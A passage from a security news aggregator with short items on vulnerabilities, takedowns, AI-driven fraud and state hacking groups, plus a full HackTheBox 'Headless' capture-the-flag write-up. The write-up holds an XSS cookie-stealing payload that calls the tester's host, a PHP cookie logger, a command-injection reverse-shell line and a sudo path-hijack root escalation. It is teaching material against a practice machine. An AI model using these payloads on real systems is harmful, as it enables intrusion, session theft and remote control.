can help reduce exposure. By adopting zero trust architecture approaches, it is possible to make significant progress toward this objective.At Tenable, we are proud to partner with our government’s leading agencies to develop strategic ways to approach cybersecurity practices. Our technology solutions help the NCCoE develop a use case that exemplifies the ZTA motto — Trust no one. Verify everything. All the time. Organizations, enterprises and federal agencies need a security model that adapts to today’s modern network, embraces remote work and protects users, applications and data wherever they’re located. The NCCoE ZTA practice guide and reference architecture can serve as an outstanding model to help them achieve their cybersecurity objectives.Learn moreView the updated draft Guidance for Implementing a Zero Trust Architecture, released by NIST on Dec. 4Find out more about the Zero Trust Architecture demonstration projectDownload the SANS Institute white paper Navigating the Path to a State of Zero Trust in 2024
by Tenable
2024-12-05 08:35:28
Headless HTB writeupInitial Access Task 1: Which is the highest open TCP port on the target machine? Let’s start off with simple nmap scan with so obvious flags, we find the highest port to be 5000. nmap -p- --min-rate 10000 10.129.71.97 -A -Pn Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-04 08:30 CST Nmap scan report for headless.htb (10.129.71.97) Host is up (0.25s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0) | ssh-hostkey: | 256 90:02:94:28:3d:ab:22:74:df:0e:a3:b2:0f:2b:c6:17 (ECDSA) |_ 256 2e:b9:08:24:02:1b:60:94:60:b3:84:a9:9e:1a:60:ca (ED25519) 5000/tcp open upnp? snip Answer: 5000 Task 2: What is the title of the page that comes up if the site detects an attack in the contact support form? We visit the website on port 5000 (as always add the host headless.htb to your /etc/hosts configuration file ), we see an portal, hmm let’s take a pause and think for a while, in order to get the message from title page, we need to perform some attack, we can go down the rabbit hole and start with sqli, and it won’t lead us anywhere. Let’s perform an simple xss attack and see what happens. We get the following error message. Answer: Hacking Attempt Detected Task 3: What is the name of the cookie that is set for a logged in user on the site? There are couple of ways to find answer for this, nmap scan with default scripts -sC gives answer, or you can check cookies by inspecting the browser, using cookie extension, and last but not least the cookie is displayed on the previous image. Answer: is_admin Task 4: What is the relative url of the page on Headless that requires authorization to access? For this we need to perform directory brute forcing and look out for http status code apart from 200. └──╼ [★]$ feroxbuster --url http://headless.htb:5000/ ___ ___ __ __ __ __ __ ___ |__ |__ |__) |__) | / ` / \ \_/ | | \ |__ | |___ | \ | \ | \__, \__/ / \ | |__/ |___ by Ben ""epi"" Risher 🤓 ver: 2.11.0 ───────────────────────────┬────────────────────── 🎯 Target Url │ http://headless.htb:5000/ 🚀 Threads │ 50 📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt 👌 Status Codes │ All Status Codes! 💥 Timeout (secs) │ 7 🦡 User-Agent │ feroxbuster/2.11.0 🔎 Extract Links │ true 🏁 HTTP methods │ [GET] 🔃 Recursion Depth │ 4 ───────────────────────────┴────────────────────── 🏁 Press [ENTER] to use the Scan Management Menu™ ────────────────────────────────────────────────── 404 GET 5l 31w 207c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 200 GET 93l 179w 2363c http://headless.htb:5000/support 200 GET 96l 259w 2799c http://headless.htb:5000/ 500 GET 5l 37w 265c http://headless.htb:5000/dashboard [#####>--------------] - 2m 8885/30001 4m found:3 errors:0 🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_headless_htb:5000_-1733334286.state ... [#####>--------------] - 2m 8894/30001 4m found:3 errors:0 Answer: dashboard Task 5: What is the parameter name on POST requests to /dashboard that has a vulnerability in it? Let’s sit back and connect the dots, /dashboard needs authentication, and in task 3 we find cookie, and in previous task our xss gets blocked, what if we had to use xss to steal cookie to authenticate in to the /dashboard? well all the previous tasks are now connecting and hopefully we authenticate and access this endpoint. We can go down the rabbit hole, and try bypassing the input, I tried a lot of payloads, matter of fact, the following payload worked but nothing really happens and the page just goes back to it’s default mode. &quot;&lt;marquee onstart=fetch(''http://10.10.14.94:8000/script.js'').then(r=&gt;r.text()).then(eval)&gt; %26quot%3b%26lt%3bmarquee+onstart%3dfetch(''http%3a//10.10.14.94%3a8000/script.js'').then(r%3d%26gt%3br.text()).then(eval)%26gt%3b So instead of injecting the input field why don’t we inject some headers? well in our case we will be targeting user-agent and it really works, seems like there is no validation on headers. Let’s try grabbing cookie from the user. First save the following file as index.php and make sure you put in the victim ip address which in our case is target IP address. <?php if (isset($_GET[''c''])) { $list = explode("";"", $_GET[''c'']); foreach ($list as $key => $value) { $cookie = urldecode($value); $file = fopen(""cookies.txt"", ""a+""); fputs($file, ""Victim IP: 10.129.73.149 | Cookie: {$cookie}\n""); fclose($file); } } ?> Now save script.js and this time save our IP address in this file. new Image().src=''http://10.10.14.119:8000?c=''+document.cookie; Now finally start php server on your instance and make sure you put your IP address in here. php -S 10.10.14.94:8000 Now change your http request to something like the following in which the payload is included in user-agent POST /support HTTP/1.1 Host: headless.htb:5000 Content-Length: 197 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://headless.htb:5000 Content-Type: application/x-www-form-urlencoded User-Agent: <script src=http://10.10.14.94:8000/script.js></script> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://headless.htb:5000/support Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs Connection: close fname=asd&lname=asd&email=asd%40gmail.com&phone=1234567890&message=%26quot%3b%26lt%3bmarquee+onstart%3dfetch(''http%3a//10.10.14.94%3a8000/script.js'').then(r%3d%26gt%3br.text()).then(eval)%26gt%3b Now if we have done everything correctly so far we must get the cookie. Now let’s use this cookie to authorise and access /dashboard Use the following extension to edit the cookie details on /dashboard this is so much easier than manually changing the cookie from inspecting the browser. https://chromewebstore.google.com/detail/cookie-editor/hlkenndednhfkekhgcdicdfddnkalmdm?hl=en Once we replace the cookie value, we should see /dashboard. And you can see we have an option to generate report, and if we click that, and look for response on burp suite, we find this has the answer for this task POST /dashboard HTTP/1.1 Host: headless.htb:5000 Content-Length: 15 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://headless.htb:5000 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://headless.htb:5000/dashboard Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0 Connection: close date=2023-09-15 Answer: date Task 6: What is the name of the user that the web application is running as? For this we need to get shell and gain RCE on this box. Well let’s try some commands on this machine. If we add the following payload to the date parameter we see we have an command injection vulnerability here. date=2023-09-15 ; id Now it’s time to get reverse shell. We will be using the following payload. Add the following lines of payload to the http request and you should get shell and make sure you are running your netcat listener on the desired port. date=2023-09-15 ;bash+-c+''bash+-i+>%26+/dev/tcp/10.10.14.94/443+0>%261'' ; └──╼ [★]$ sudo nc -nlvp 443 listening on [any] 443 ... connect to [10.10.14.94] from (UNKNOWN) [10.129.71.97] 38522 bash: cannot set terminal process group (1152): Inappropriate ioctl for device bash: no job control in this shell dvir@headless:~/app$ whoami whoami dvir dvir@headless:~/app$ Answer: dvir Task 7: Submit the flag located in the dvir user’s home directory. cat /home/dvir/user.txt Privilege Escalation Task 8: What is the full path to the script that dvir can run as any user without a password? This one has to be obvious, we have to run sudo -l to see what we can run as user without password. dvir@headless:~/app$ sudo -l Matching Defaults entries for dvir on headless: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty User dvir may run the following commands on headless: (ALL) NOPASSWD: /usr/bin/syscheck Answer: syscheck Task 9: syscheck calls other scripts to collect output. What is the name of the script that is called with a relative path? Let’s have an look at syscheck dvir@headless:~/app$ cat /usr/bin/syscheck cat /usr/bin/syscheck #!/bin/bash if [ ""$EUID"" -ne 0 ]; then exit 1 fi last_modified_time=$(/usr/bin/find /boot -name ''vmlinuz*'' -exec stat -c %Y {} + | /usr/bin/sort -n | /usr/bin/tail -n 1) formatted_time=$(/usr/bin/date -d ""@$last_modified_time"" +""%d/%m/%Y %H:%M"") /usr/bin/echo ""Last Kernel Modification Time: $formatted_time"" disk_space=$(/usr/bin/df -h / | /usr/bin/awk ''NR==2 {print $4}'') /usr/bin/echo ""Available disk space: $disk_space"" load_average=$(/usr/bin/uptime | /usr/bin/awk -F''load average:'' ''{print $2}'') /usr/bin/echo ""System load average: $load_average"" if ! /usr/bin/pgrep -x ""initdb.sh"" &>/dev/null; then /usr/bin/echo ""Database service is not running. Starting it..."" ./initdb.sh 2>/dev/null else /usr/bin/echo ""Database service is running."" fi exit 0 You can use chatgpt to analyze and understand the code better. For the sake of brevity we will be omitting this part. To sum up this code performs the following activites. Root Check: Ensures the script is run with root privileges. Kernel Check: Displays the last kernel modification time in /boot. Disk Space Check: Reports available disk space on the root filesystem. System Load Check: Outputs system load averages. Database Initialization We will be exploitting the later part of code which has database Initialization, if we are able to execute a new shell inside this script then we might be able to get root. Answer: initdb.sh Interestingly when we look around for a file called initdb.sh we find so such file exists. find ~/app -type f -name ""initdb.sh"" 2>/dev/null ps aux | grep ""[i]nitdb.sh"" So we have to create an file called initdb.sh and then have the script bash shell run echo -e ''#!/bin/bash\n/bin/bash'' > /tmp/initdb.sh Give it executable permissions and run the script. chmod +x /tmp/initdb.sh sudo /usr/bin/syscheck Task 10: Submit the flag located in the root user’s home directory. Now we should get the flag. dvir@headless:/tmp$ sudo /usr/bin/syscheck sudo /usr/bin/syscheck Last Kernel Modification Time: 01/02/2024 10:05 Available disk space: 1.9G System load average: 0.02, 0.07, 0.04 Database service is not running. Starting it... whoami root cat /root/root.txt Beyond Root After we got root, in /home we see an directory called app, which has got app.py if we look closely we can see why xss and command injection occurs. 1. Vulnerability in /support Route Problematic Code: if (""<"" in message and "">"" in message) or (""{{"" in message and ""}}"" in message): html = render_template(''hackattempt.html'', request_info=format_request_info(request_info)) with open(os.path.join(hacking_reports_dir, filename), ''w'', encoding=''utf-8'') as html_file: html_file.write(html) return html Here we note the following drawbacks in the code. Insufficient Filtering: Simple checks for <, > fail against encoded or obfuscated payloads (e.g., %3Cscript%3Ealert(1)%3C/script%3E). Unfiltered Input in request_info: Malicious user inputs are embedded into the response (hackattempt.html) without sanitization. — 2. Vulnerability in /dashboard Route Problematic Code: script_output = os.popen(f''bash report.sh {date}'').read() Here this code leads to command injection vulnerability. Unsanitized date parameter enables injection (e.g., 2023-12-01; rm -rf /). — 3. Misuse of is_admin Cookie in /dashboard Problematic Code: if serializer.loads(request.cookies.get(''is_admin'')) == ""user"": return abort(401) Cookie Tampering: If app.secret_key is compromised, attackers can forge cookies to escalate privileges. Recommendations Do sanitize user input: Use a library like Bleach: import bleach message = bleach.clean(request.form.get(''message'')) Make user of escape Outputs: Use Jinja2’s escaping ({{ variable | e }}). To Prevent Command Injection: Replace os.popen with subprocess.run: import subprocess script_output = subprocess.run([''bash'', ''report.sh'', date], capture_output=True, text=True).stdout Use Secure Cookies: Replace client-side cookies with server-side sessions: session[''is_admin''] = True
by HACKLIDO
2024-12-05 08:29:21
CISA Adds Three Critical Vulnerabilities to KEV Catalog: Immediate Action UrgedThe Cybersecurity and Infrastructure Security Agency (CISA) recently updated its Known Exploited Vulnerabilities (KEV) Catalog, adding three critical vulnerabilities that are being actively exploited by cybercriminals. The flaws in these products could lead to unauthorized access, data breaches, and service disruptions if left unaddressed. The newly added vulnerabilities include CVE-2023-45727, which affects North Grid Proself and is related to an improper restriction of XML External Entity (XXE) reference. Another critical flaw, CVE-2024-11680, impacts ProjectSend and is caused by an improper authentication vulnerability. Finally, CVE-2024-11667 affects Zyxel firewalls, where a path traversal vulnerability can be exploited. CVE-2023-45727: North Grid Proself XXE Vulnerability The first vulnerability, CVE-2023-45727, affects multiple versions of North Grid’s Proself product suite. These include the Proself Enterprise/Standard Edition (versions 5.62 and earlier), Proself Gateway Edition (versions 1.65 and earlier), and Proself Mail Sanitize Edition (versions 1.08 and earlier). This flaw stems from an improper restriction in the XML External Entity (XXE) processing feature. An attacker can exploit this vulnerability by sending specially crafted XML data to the affected systems. If successful, this could allow remote unauthenticated attackers to access arbitrary files on the server, including those containing sensitive account information. The risk is high as the vulnerability could lead to data manipulation or theft, exposing critical organizational data. The flaw was published on October 18, 2023, and it was added to the KEV catalog shortly after due to its potential impact. Organizations using the affected Proself products are strongly urged to apply patches that address this vulnerability and mitigate the risk of exploitation. CVE-2024-11680: ProjectSend Authentication Bypass The second vulnerability in CISA’s updated KEV catalog is CVE-2024-11680, which affects the ProjectSend file management application. Specifically, versions prior to r1720 are vulnerable to an improper authentication flaw. This vulnerability allows remote attackers to send specially crafted HTTP requests to the options.php file, which enables them to bypass authentication mechanisms. Once authenticated, attackers can make unauthorized changes to the system configuration, including creating new user accounts, uploading malicious content (such as webshells), or embedding harmful JavaScript. With a critical CVSS score of 9.8, this flaw poses online risks for organizations using vulnerable versions of ProjectSend. This vulnerability was published on November 26, 2024, and organizations are advised to immediately update to the latest version to prevent exploitation. CVE-2024-11667: Zyxel Firewalls Path Traversal The third vulnerability, CVE-2024-11667, impacts several Zyxel firewall models, including the ATP series, USG FLEX series, and USG20(W)-VPN series. The vulnerability lies in the web management interface of firmware versions V5.00 through V5.38 for these devices, enabling attackers to perform a path traversal attack. A path traversal vulnerability allows attackers to manipulate file paths in the system, potentially gaining access to sensitive files or uploading malicious files. In the case of these Zyxel firewalls, attackers could exploit this vulnerability to compromise the device’s security. With a CVSS score of 7.5, this flaw is considered high risk but not as critical as the ProjectSend vulnerability. The flaw was published on November 27, 2024, with an update the following day. Organizations using affected Zyxel products should promptly apply security updates to protect against this attack vector. Mitigations for Known Exploited Vulnerabilities The inclusion of CVE-2023-45727, CVE-2024-11680, and CVE-2024-11667 in the CISA Known Exploited Vulnerabilities (KEV) Catalog emphasizes the ongoing cybersecurity challenges faced by industries relying on these vulnerable products. These flaws, which span various attack vectors like XML External Entity (XXE) attacks, improper authentication, and path traversal, pose online risks to organizations using these systems for critical operations. To mitigate these vulnerabilities, organizations must prioritize patch management, strengthen authentication practices, conduct regular security audits, and have incident response plans in place. Proactively addressing these vulnerabilities is essential to protect systems from potential exploits, ensuring the continued security and reliability of operations.
by The Cyber Express
2024-12-05 08:19:19
Tenable Patch Management prevents problematic updatesTenable released Tenable Patch Management, an autonomous patch solution built to close vulnerability exposures in a unified solution. A strategic partnership and integration with Adaptiva provides the foundation of the solution. Vulnerability remediation remains a critical challenge as identifying, testing and installing the countless patches released every day is cumbersome. A recent Tenable report found that only 11% of organizations say they are efficient at vulnerability remediation. The result is that organizations are exposed for … More → The post Tenable Patch Management prevents problematic updates appeared first on Help Net Security.
by Help Net Security
2024-12-05 07:53:22
China-linked APT Salt Typhoon has breached telcos in dozens of countriesChina-linked APT group Salt Typhoon has breached telecommunications companies in dozens of countries, US govt warns. President Biden’s deputy national security adviser Anne Neuberger said that China-linked APT group Salt Typhoon has breached telecommunications companies in dozens of countries. The Wall Street Journal reported that the senior White House official revealed that at least eight […]
by Security Affairs
2024-12-05 07:17:55
How the NCA Cracked Billion-Dollar Money Laundering Rings Linked to Ransomware GangsThe UK’s National Crime Agency (NCA) has disrupted two extensive Russian money laundering networks that operated across continents, aiding criminals worldwide, including notorious ransomware gangs. Dubbed Operation Destabilise, this multi-agency investigation exposed the workings of the “Smart” and “TGR” networks—criminal enterprises that laundered billions of pounds while facilitating a range of illicit activities, including cybercrime, drug trafficking, and sanctions evasion. A Coordinated Global Crackdown The operation, unveiled today, is the culmination of a years-long international investigation led by the NCA and supported by partners such as the US Department of the Treasury’s Office of Foreign Assets Control (OFAC), the FBI, and authorities in the UAE, France, and Ireland. To date, it has resulted in 84 arrests, the seizure of over £20 million in cash and cryptocurrency, and the dismantling of a highly advanced criminal infrastructure spanning more than 30 countries. “Operation Destabilise has exposed billion-dollar money laundering networks operating in ways previously unknown to law enforcement,” said an NCA spokesperson. “For the first time, we’ve been able to link Russian elites, crypto-rich cybercriminals, and UK drug gangs under one sprawling criminal web.” Meet the Criminal Networks: Smart and TGR The investigation centered on two key networks, Smart and TGR, which worked in tandem to provide a seamless money laundering service. Smart, led by Ukrainian George Rossi, specialized in routing illicit funds through complex channels, often converting cash to cryptocurrency to obscure the origin of the money. TGR, controlled by Russian Ekaterina Zhdanova, focused on managing courier networks and facilitating large-scale cash handovers. Zhdanova worked closely with her deputies Khadzi-Murat Magomedov and Nikita Krasnov, who coordinated couriers in the UK and beyond. These networks offered a mutually beneficial service: they helped UK-based drug gangs launder cash, reinvesting it in illegal activities like drug and firearm trafficking, while simultaneously enabling Russian elites and cybercriminals to bypass international sanctions and invest in Western economies. How the Scheme Worked At the heart of Smart and TGR’s operations was a complex yet effective scheme: Cash Collection: Criminal gangs in one country would hand over large sums of illicit cash to couriers. Crypto Conversion: The equivalent value in cryptocurrency was transferred to the gangs, enabling them to reinvest in their illegal businesses without moving physical money across borders. Global Laundering: The cryptocurrency was then routed through exchanges, including some linked to sanctioned entities, making it virtually untraceable. Investigators uncovered over 55 cash handover locations across the UK alone. One London-based courier, Fawad Saiedi, laundered £15 million before being sentenced to four years and four months in prison. Other couriers, such as Semen Kuksov and Andrii Dzektsa, facilitated transactions totaling over £12 million in just two months, operating not only in the UK but also across Europe. Impacts on Cybercrime and Sanctions Evasion The reach of Smart and TGR extended beyond physical crime. The networks laundered millions for ransomware gangs, including the Ryuk group, which extorted over £27 million from UK victims such as schools, hospitals, and businesses. Additionally, they helped Russian oligarchs bypass financial restrictions, threatening the integrity of Western economies. In one case, TGR moved £2 million into the UK to purchase property for a Russian client, bypassing anti-money laundering checks. Another operation linked the networks to funds transferred out of Russia to support a sanctioned Russian media organization in the UK. Cracking Down on Dirty Money The combined efforts of the NCA and international partners have not gone unnoticed. The sanctions announced by OFAC today target six key figures in the networks, including George Rossi, Ekaterina Zhdanova, and Elena Chirkinyan, as well as four businesses associated with TGR. These measures aim to dismantle the networks’ financial infrastructure and disrupt their global operations. The operation has also dealt a significant financial blow to the networks, which typically charged low commissions of around 3% for laundering services. With £20 million seized, they would need to process over £700 million in funds just to recover their losses. A Message to Criminals The success of Operation Destabilise sends a strong message: the UK is not a safe haven for money laundering. Increased law enforcement activity has already made it more difficult for Russian-speaking laundering networks to operate in London, with many now charging higher commission rates due to heightened risks. Security Minister Dan Jarvis applauded the operation, stating: “Illicit finance inflicts immense harm around the world, and this major global operation marks a significant step against economic crime. The UK and its allies will continue to work together to crack down on illicit finance and the criminality it enables.” A Call for Community Vigilance The NCA emphasized the role of community intelligence and neighborhood policing in identifying and tackling criminal activities. “Money laundering deprives society of funds that pay for schools, hospitals, and social services,” an official noted. “Together, we can ensure crime doesn’t pay.” By disrupting these networks, the NCA and its partners have struck a blow against not just money laundering but the broader ecosystem of violence, cybercrime, and corruption that it fuels.
by The Cyber Express
2024-12-05 07:00:00
African Law Enforcement Nabs 1,000+ Cybercrime SuspectsAuthorities across 19 African countries also dismantled their infrastructure and networks, thanks to cooperation between global law enforcement and private firms.
by Dark Reading
2024-12-05 06:00:00
Mitel MiCollab zero-day flaw gets proof-of-concept exploitResearchers have uncovered an arbitrary file read zero-day in the Mitel MiCollab collaboration platform, allowing attackers to access files on a server''s filesystem. [...]
by BleepingComputer
2024-12-05 05:23:51
Voice Cloning, Fake Videos & More: AI Is Making Scams UnstoppableThe FBI has issued a new warning about the increasing use of artificial intelligence (AI) in online fraud schemes, which are becoming more advanced and difficult to detect. ""The FBI is warning the public that criminals exploit generative artificial intelligence (AI) to commit fraud on a larger scale which increases the believability of their schemes,"" reads the statement released by FBI. Criminals are leveraging generative AI tools to create highly convincing social media profiles, fraudulent websites, and even audio and video content to deceive victims on a larger scale. These AI technologies make scams more believable and harder to identify, heightening the risks for individuals and businesses alike. Generative AI refers to tools that can create new content—such as text, images, audio, and videos—based on examples input by users. While the creation of synthetic content itself is not illegal, it can be exploited to facilitate crimes like fraud, extortion, and identity theft. Since generative AI can produce highly realistic content that may seem genuine at first glance, recognizing when a piece of content is AI-generated can be challenging. How Scammers Use Generated AI in Fraud Schemes AI-generated text, images, audio, and videos are being used by criminals to manipulate their victims in various ways. Here’s how these technologies are making scams more effective: AI-Generated Text: Criminals are using AI to create convincing written content that seems legitimate, such as emails, text messages, and social media posts. This helps them reach a larger audience more efficiently while overcoming typical signs of fraud. For example, AI can generate fake social media profiles to engage victims in romance scams, investment fraud, or job hiring schemes. AI-powered tools can also help translate messages into different languages, ensuring that international fraudsters can target victims without grammatical errors that would usually raise suspicion. Scammers are also using generative AI to craft fraudulent investment websites, often for schemes involving cryptocurrency, or to embed chatbots that trick users into clicking malicious links. AI-Generated Images: Criminals are using AI to create realistic images that support their fraudulent activities. These images can be used for fake social media profiles or to create phony identification documents. AI tools allow fraudsters to generate photos that appear to be of real people, which they then use to support romance scams, confidence fraud, or fake investment schemes. Some scammers have used AI to produce images of celebrities or social media influencers promoting counterfeit products or fake fundraising campaigns. AI-generated images are also used in extortion schemes, such as creating fake pornographic photos of a victim to blackmail them into paying money. AI-Generated Audio (Vocal Cloning): Another alarming trend is the use of AI to clone voices, which allows scammers to impersonate well-known figures or even close family members. By mimicking someone’s voice, criminals can trick victims into transferring money or sharing sensitive information. Scammers may create short audio clips of a loved one’s voice to make it seem as though the victim is being contacted in a crisis, prompting immediate financial assistance or a ransom demand. AI-generated audio can also be used to impersonate bank officials or other trusted sources in order to gain access to sensitive accounts or convince victims to provide personal information. AI-Generated Videos: Criminals are also using AI to create fake videos that enhance the believability of their scams. These videos might feature public figures or fictitious personas to make the fraud seem more credible. Fraudsters have used AI to create videos that appear to be from company executives, law enforcement officials, or other authority figures. These videos are often used in schemes involving fake job offers or investment fraud. Private communications may include AI-generated videos of someone the victim believes to be real, further bolstering the illusion that they are communicating with a legitimate person. Tips to Protect Yourself from AI-Driven Scams As AI-generated content becomes more advanced, it’s crucial to remain vigilant and aware of the warning signs. The FBI offers several tips to help people protect themselves from falling victim to AI-driven fraud: Create a Secret Word or Phrase: Establish a secret code with family members to verify identities in case of a crisis. This simple step can help prevent scams that involve impersonating loved ones. Look for Imperfections: AI-generated images and videos, although realistic, often contain subtle flaws. Watch for distorted faces, unrealistic eyes or teeth, strange hand or foot shapes, and irregular shadows. Similarly, listen for any odd pauses or mismatched tones in audio clips. Limit Your Online Presence: Consider minimizing the amount of personal content you post online. Make your social media accounts private and only accept friend requests from people you know. Limiting access to your images and voice can make it harder for criminals to use AI tools to create fraudulent identities. Verify Unsolicited Calls or Messages: If you receive a call or message asking for money or personal information, do not engage immediately. Instead, hang up and research the contact through official channels. Always call back using a trusted phone number from a website or official documentation. Don’t Share Sensitive Information: Never share sensitive information with people you have only met online or over the phone. This includes personal details, passwords, or financial information. Never Send Money to Strangers: Be cautious when asked to send money, gift cards, or cryptocurrency to people you don’t know, especially if you’ve only met them online or over the phone. What to Do if You Fall Victim to a Fraud Scheme If you suspect that you have been scammed, it’s important to act quickly. The FBI advises victims to file a report with the Internet Crime Complaint Center (IC3) at www.ic3.gov. When submitting a report, include as much information as possible, such as: Identifying details about the scammer, such as name, phone number, email, and physical address. Financial transaction information, including dates, payment methods, amounts, and account numbers. A description of your interaction with the scammer, including how contact was made, the type of request, and any other relevant details. By staying informed and cautious, you can reduce your risk of falling victim to these increasingly advanced AI-powered fraud schemes.
by The Cyber Express
2024-12-05 04:59:17
Networking Basics 101 - Day 1It’s been so long since I blogged and I believe it was the right time to brush up on a few basics. So, here’s “Networking”, for you! So what is Networking in Layman’s terms? Simple. Connecting multiple devices allows them to exchange information and resources. Today, we shall look at some of the basic network types available in today’s day and age. Did you know, everything is online nowadays? We expect all our devices such as Mobile Phones, Tablets, Laptops, and Desktop computers always to be connected to the global internet. We use this network to interact with our friends and shops, share pictures, and experiences, and learn. The internet has become such a part of everyday life that we almost take it for granted. So, who owns the Internet? Us! You disagree? Let me tell you, the Internet is nothing but a collection of interconnected networks worldwide. Technically, we “all (our devices)”, cooperate to exchange information and resources. Isn’t it amazing? Everything is online, like Social Media, Online courses, etc. All of these destinations are connected to the local network that sends and receives information through the Internet. What are Local Networks? In simple terms, it is a collection of devices that are connected to a single physical network connection. Like the ones at home, or office. That’s it for today. I know that it was not much, but I was just covering some of the basic stuff, which will be useful to some of the laymen out there. Day 2, I will be covering some more topics, with more examples. I believe in you learn I learn motto, so if you have any feedback or suggestions for me, do let me know in the comments, and I will try and correct it in the coming days. Ciao!
by HACKLIDO
2024-12-05 00:00:00
BlueAlpha Abuses Cloudflare Tunneling Service for GammaDrop Staging InfrastructureBlueAlpha, a Russian cyber group, uses Cloudflare Tunnels to deploy GammaDrop malware, escalating challenges in targeting Ukrainian entities.
by Recorded Future
2024-12-05 00:00:00
On-Demand BOF<p>From the team that brought you COFF Loader, CS-Situational-Awareness-BOF, CS-Remote-OPs-BOF, and numerous blogs on BOFs, we are excited to release our first on-demand class: Building BOFs. TrustedSec has had private…</p>
by TrustedSec
2024-12-04 22:53:00
Russia-Linked Turla Exploits Pakistani Hackers' Servers to Target Afghan and Indian EntitiesThe Russia-linked advanced persistent threat (APT) group known as Turla has been linked to a previously undocumented campaign that involved infiltrating the command-and-control (C2) servers of a Pakistan-based hacking group named Storm-0156 to conduct its own operations since 2022. The activity, first observed in December 2022, is the latest instance of the nation-state adversary ""embedding
by The Hacker News
2024-12-04 22:52:40
Onapsis Expands Code Security Capabilities to Accelerate and De-Risk SAP BTP Development Projects
by Dark Reading
2024-12-04 22:44:54
Wyden and Schmitt Call for Investigation of Pentagon's Phone Systems
by Dark Reading
2024-12-04 22:06:31
CISA Issues Guidance to Telecom Sector on Salt Typhoon ThreatIndividuals concerned about the privacy of their communications should consider using encrypted messaging apps and encrypted voice communications, CISA and FBI officials say.
by Dark Reading
2024-12-04 22:00:36
It’s the Senate’s last chance to pass the PRESS ActThe PRESS Act, which would protect a journalist''s sources, gained unanimous bipartisan support when passed by the House in January. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-12-04 21:59:39
Black Basta ransomware gang hit BT GroupBT Group (formerly British Telecom)’s Conferencing division shut down some of its servers following a Black Basta ransomware attack. British multinational telecommunications holding company BT Group (formerly British Telecom) announced it has shut down some of its servers following a Black Basta ransomware attack. “We identified an attempt to compromise our BT Conferencing platform. This […]
by Security Affairs
2024-12-04 21:56:58
OpenAI inks deal to upgrade Anduril’s anti-drone techOpenAI plans to team up with Anduril, the defense startup, to supply its AI tech to systems the U.S. military uses to counter drone attacks. The Wall Street Journal reports that Anduril will incorporate OpenAI tech into software that assesses and tracks unmanned aircraft. Anduril tells the publication that OpenAI’s models could improve the accuracy […] © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-12-04 21:03:52
API Security in Open Banking: Balancing Innovation with Risk ManagementAny technological innovation comes with security risks, and open banking is no exception. Open banking relies on APIs…
by Hackread
2024-12-04 20:47:46
Russian FSB Hackers Breach Pakistani APT Storm-0156Parasitic advanced persistent threat (APT) Secret Blizzard accessed another APT''s infrastructure, and stole the same kinds of info it targets in South Asian government and military victims.
by Dark Reading
2024-12-04 20:47:45
Sharing your Max password? That's about to get more difficultLike other streaming services, Discovery Max will give you the chance to officially add someone to your account.
by ZDNET Security
2024-12-04 20:47:06
Veeam Urges Updates After Discovering Critical VulnerabilityThe vulnerability affects certain versions of the Veeam Service Provider Console that can only be fixed by updating with the latest patch.
by Dark Reading
2024-12-04 20:14:04
Authorities shut down Crimenetwork, the Germany’s largest crime marketplaceGermany’s largest crime marketplace, Crimenetwork, has been shut down, and an administrator has been arrested. German authorities announced the takedown of Crimenetwork, the largest German-speaking underground marketplace. Since 2012, Crimenetwork facilitated the sale of illegal goods and services, including drugs, forged documents, hacking tools, and stolen data. The platform served as a hub for cybercriminals […]
by Security Affairs
2024-12-04 20:06:00
Pegasus Spyware Infections Proliferate Across iOS, Android DevicesThe notorious spyware from Israel''s NSO Group has been found targeting journalists, government officials, and corporate executives in multiple variants discovered in a threat scan of 2,500 mobile phones.
by Dark Reading
2024-12-04 20:05:08
Open Source Software Powers 96% of Modern Applications, New Study FindsThe Linux Foundation''s Census III report reveals critical dependencies and growing security concerns in open source software.
by ITPro Today
2024-12-04 19:44:43
Microsoft says having a TPM is "non-negotiable"" for Windows 11Microsoft made it abundantly clear this week that Windows 10 users won''t be able to upgrade to Windows 11 unless their systems come with TPM 2.0 support, stating it''s a ""non-negotiable"" requirement. [...]
by BleepingComputer
2024-12-04 19:30:49
Are We on the Brink of Saying Goodbye to Passwords?Explore the transition from passwords to a passwordless future: enhanced security, convenience, and cutting-edge innovations in biometrics and…
by Hackread
2024-12-04 18:44:36
Wallets vs. Passkeys: What CISOs Need To KnowFor long-term success, CISOs must strategically plan to integrate wallets and passkeys into their organizations.
by ITPro Today
2024-12-04 18:33:34
Veeam Warns of Critical Vulnerability in Service Provider ConsoleVeeam releases patches for two vulnerabilities in Service Provider Console, including a critical-severity remote code execution bug. The post Veeam Warns of Critical Vulnerability in Service Provider Console appeared first on SecurityWeek.
by SecurityWeek
2024-12-04 18:16:52
Critical Veeam Vulnerabilities Allow Remote Code Execution – Update NowSUMMARY Veeam, a leading provider of backup, recovery, and data management solutions, has issued urgent security updates to…
by Hackread
2024-12-04 18:00:27
White House: Salt Typhoon hacked telcos in dozens of countriesChinese state hackers, known as Salt Typhoon, have breached telecommunications companies in dozens of countries, President Biden''s deputy national security adviser Anne Neuberger said today. [...]
